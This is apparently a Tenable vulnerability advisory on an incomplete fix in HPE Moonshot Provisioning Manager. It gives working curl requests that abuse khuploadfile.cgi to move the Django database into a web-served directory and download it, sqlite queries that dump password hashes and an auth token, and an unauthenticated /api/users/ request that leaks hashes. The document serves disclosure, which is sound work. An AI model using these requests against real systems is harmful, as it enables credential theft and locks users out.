While developing a Nessus plugin for CVE-2018-7072 and CVE-2018-7073, Tenable discovered that the fix in HPE Moonshot Provisioning Manager v1.24 for HPE advisory HPESBHF03843 is incomplete. In v1.24, /opt/hp/moonshot/upload/ and many other directories are still writable by the user moonshot:
#find / -maxdepth 5 -type d -user moonshot -perm /u+w -printf "%M %u %p \n" 2> /dev/null
drwx------ moonshot /home/moonshot
drwxr-xr-x moonshot /var/lib/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot/include
drwxr-xr-x moonshot /opt/hp/moonshot/repo
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/switch_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/prov_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/moonshot_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/task_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/upgrade
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/root
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/os_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/user_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/pydeps
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/conf
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tclient
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/bin
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/answers
drwxr-xr-x moonshot /opt/hp/moonshot/upload
drwxr-xr-x moonshot /opt/hp/moonshot/logs
drwxr-xr-x moonshot /opt/hp/moonshot/bin
drwxr-xr-x moonshot /opt/hp/moonshot/bin/__pycache__
drwxr-xr-x moonshot /opt/hp/moonshot/lib
drwxr-xr-x moonshot /opt/hp/moonshot/lib/python3.3
For example, the attacker can move the db.sqlite3 file in /var/lib/moonshot to /opt/hp/moonshot/upload/:
$ curl -kd "isofile.savepath=/var/lib/moonshot/db.sqlite3&isofile.filename=db.sqlite3" https://<mpm_host>/cgi-bin/khuploadfile.cgi
<html>
<body>
<p>
File Upload Success
<p>
</body>
</html>
Then the attacker can fetch the db.sqlite3 file with:
$ curl -k -o db.sqlite3 'https://<mpm_host>/upload/db.sqlite3'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 95232 100 95232 0 0 294k 0 --:--:-- --:--:-- --:--:-- 567k
The db.sqlite3 file is the database for the 'tinkerbell' Django project and contains various information about the web application at https://<mpm_host>/. For example, it contains information about configured users and authentication tokens of logged in users:
$ sqlite3 db.sqlite3
SQLite version 3.6.20
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .table
auth_group moonshot_mgr_addressrecord
auth_group_permissions moonshot_mgr_chassis
auth_permission moonshot_mgr_chassisauthtoken
auth_user moonshot_mgr_nic
auth_user_groups moonshot_mgr_node
auth_user_user_permissions moonshot_mgr_switch
authtoken_token os_mgr_configurationfile
django_admin_log os_mgr_operatingsystem
django_content_type os_mgr_update
django_migrations prov_mgr_backup
django_session prov_mgr_clone
djkombu_message prov_mgr_install
djkombu_queue task_mgr_vlanassignmentrecord
sqlite> .header on
sqlite> select * from auth_user;
id|password|is_superuser|username|first_name|last_name|email|is_staff|is_active|date_joined|last_login
1|pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=|1|user1|user number 1|||1|1|2018-08-01 22:43:43.292870|2018-08-21 22:28:15.787135
2|pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=|1|user2|user number 2|||1|1|2018-08-21 22:47:59.549245|
sqlite> select * from authtoken_token;
key|created|user_id
e8419331029d8b4d24369cdab9a69b6d97bf3bf0|2018-08-21 22:27:23.451159|1
This information may help the attacker launch further attacks.
Also, because /var/lib/moonshot/db.sqlite3 is moved to /opt/hp/moonshot/upload/, valid users can no longer login to the web UI at https://<mpm_host>/.
Tenable also found another security issue with URL endpoint /api/users/, which allows an unauthenticated remote attacker to fetch all user accounts with sensitive information including password hashes:
$ curl -k 'https://<mpm_host>/api/users/'
[{"url":"https:/<mpm_host>/</api/users/1/","username":"user1","first_name":"user number 1","password":"pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":"2018-08-21T22:28:15.787135Z","date_joined":"2018-08-01T22:43:43.292870Z"},{"url":"https:///api/users/2/","username":"user2","first_name":"user number 2","password":"pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":null,"date_joined":"2018-08-21T22:47:59.549245Z"}]